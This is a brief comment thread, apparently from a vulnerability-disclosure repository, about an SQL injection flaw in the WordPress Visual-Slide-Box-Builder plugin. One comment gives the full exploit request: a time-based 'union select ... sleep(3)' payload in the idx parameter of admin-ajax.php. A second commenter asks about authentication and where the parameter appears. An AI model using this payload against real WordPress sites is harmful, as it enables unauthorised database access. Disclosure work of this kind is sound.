nu11secur1ty
commented
2 years ago Hello, the URL + parameter:
GET /wordpress/wp-admin/admin-ajax.php?action=vsbb_get_one&idx=1%20union%20select%201,2,3,4,5,sleep(3) HTTP/1.1\nThank you for your response, and BR
hello. thanks for this project. i dont understand.. Is the Visual-Slide-Box-Builder-plugin vulnerability an authorized vulnerability? If an unauthorized user is exploiting this vulnerability, on which page exactly is the "idx" parameter located?